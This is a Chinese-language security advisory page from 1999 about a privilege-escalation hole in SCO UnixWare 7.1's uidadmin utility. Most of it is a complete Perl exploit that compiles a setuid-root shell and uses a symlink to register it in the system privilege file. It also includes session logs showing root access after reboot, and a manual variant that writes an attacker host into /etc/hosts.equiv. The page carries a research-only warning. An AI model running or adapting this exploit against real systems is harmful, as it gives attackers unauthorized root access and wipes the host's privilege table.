首页 -> 安全研究

安全研究

安全漏洞
UnixWare 7 uidadmin 溢出漏洞

发布日期:1999-11-02
更新日期:1999-11-02

受影响系统:
SCO UnixWare 7.1
描述:
通过SCO UnixWare 7.1的sgid-sys /usr/bin/uidadmin对"任何”文件的写权限,可以得到root
权限。

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

A warning about the uix.pl exploit:
uix.pl will overwrite /etc/security/tcb/privs with a single entry. All other
entries will be lost and thus the next time the kernel permissions table is
rebuilt, you will not be able to run any programs (as a regular user) with the
permissions they had before the reboot. I.E. ping won''t work because it
doesn''t gain "driver" privileges anymore.

To get around this, make sure you login immediatly after reboot, execute your
rootshell and "cat /etc/security/tcb/oprivs >> /etc/security/tcb/privs" then
run "initprivs" to re-install all privileged programs.

bash-2.02$ id
uid=106(xnec) gid=1(other)
bash-2.02$ ls -la /usr/bin/uidadmin
-r-xr-s--x 1 sys sys 18012 Apr 3 1998 /usr/bin/uidadmin
bash-2.02$ ./uix.pl

* uidadmin exploit for UnixWare 7.1


/home/xnec/ui successfully compiled
/home/xnec/ui size=3760 ctime=944185049
/home/xnec/ui checksum is 16136
placing ''3760:16136:944185049:%fixed,allprivs:/home/xnec/ui'' into /tmp/uidata
UX:uidadmin: ERROR: mandatory field(s) missing
Exploit successful. Run /home/xnec/ui after reboot for rootshell
bash-2.02$

AFTER REBOOT:
bash-2.02$ ./ui
#


--- uix.pl ---
#!/usr/bin/perl

###########################################################
# /usr/bin/uidadmin exploit for UnixWare 7.1
# Uses a symlink exploit to add our program to a list of elevated privileges
# programs in /etc/security/tcb/privs. After reboot, /tmp/ui will be added
# to the list of privileged programs.
#
# Format of the privs file is as follows (ctime and size are just as
# st_ctime and st_size as described by stat(2)):
# size:checksum:time:perms:/full/path/to/prog
#
# -Brock Tellier btellier@usa.net
#
###########################################################

$ui_source = "/home/xnec/ui.c";
$ui_dest = "/home/xnec/ui";
$ui_code = "void main() { setreuid(0,0); system(\"/bin/ksh\");}";
$privloc = "/etc/security/tcb/privs";
$uidatafile="/tmp/uidata";
$sumpath = "/usr/bin/sum";
$uidata_sym = "/tmp/uidata.tmp";
$compiler = "cc";
$uidadmin = "/usr/bin/uidadmin";

###
# Path to the directory where your $uidata_sym will exist relative to
# /etc/uidata/
###
$uidadminarg = "../../tmp";


print("\n* uidadmin exploit for UnixWare 7.1 \n\n");

###
# Output $ui_code to $ui_source and compile into $ui_dest
###

open(UIS, ">$ui_source");
printf(UIS "$ui_code\n");
close(UIS);
system ("$compiler -o $ui_dest $ui_source");
if ( -e $ui_dest ) {
print("\n$ui_dest successfully compiled\n");
}
else { die "error compiling $ui_dest"; }

###
# stat $ui_dest for size in bytes and ctime (seconds since epoch)
###

$size=(stat($ui_dest))[7] || die "cannot stat $ui_dest";
$ctime=(stat($ui_dest))[10];
print("$ui_dest size=$size ctime=$ctime\n");

###
# get the checksum value for $ui_dest
###

open(SUM, "$sumpath -r $ui_dest|");
$checksum=;
chomp($checksum);
@sumfields=split('' '', $checksum);
$chksum = @sumfields[0];
$chksum =~ s/^0//;

print("$ui_dest checksum is $chksum\n");

###
# Put our entry into $uidatafile, use trailing newline
###

$uidata="$size:$chksum:$ctime:\%fixed,allprivs:$ui_dest";
print("placing ''$uidata'' into $uidatafile\n");
open(TMP, ">$uidatafile");
print(TMP "$uidata\n");
close(TMP);

###
# Create symlink from $uidata_sym to $privloc
###
symlink($privloc, $uidata_sym);

###
# All the preparation is done, launch the exploit
###

system("$uidadmin -S $uidadminarg -a -r bah");

###
# Find out if the exploit worked, assume it did if $ui_dest is in $privloc
###

open (PRIV, "$privloc");
@privs = ;
foreach $priv (@privs) {
if ($priv =~ /$ui_dest/) {
print("Exploit successful. Run $ui_dest after reboot for rootshell
\n");
exit(0);
}
}
print("Exploit not successful, sorry!\n");


--- /uix.pl ----

--- for those with little patience ---

bash-2.02$ id
uid=106(xnec) gid=1(other)
bash-2.02$ ls -la /etc/hosts.equiv
UX:ls: ERROR: Cannot access /etc/hosts.equiv: No such file or directory
bash-2.02$ ls -la /usr/bin/uidadmin
-r-xr-s--x 1 sys sys 18012 Apr 3 1998 /usr/bin/uidadmin
bash-2.02$ ln -s /etc/hosts.equiv /tmp/uidata.tmp
bash-2.02$ echo "cracker.com" > /tmp/uidata
bash-2.02$ /usr/bin/uidadmin -S ../../tmp -a -r bah
UX:uidadmin: ERROR: mandatory field(s) missing
bash-2.02$ cat /etc/hosts.equiv
cracker.com
bash-2.02$ ls -al /etc/hosts.equiv
-rw-rw-r-- 1 sys sys 12 Dec 2 19:05 /etc/hosts.equiv
bash-2.02$

--- /patience ---


建议:
暂无

浏览次数:10095
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障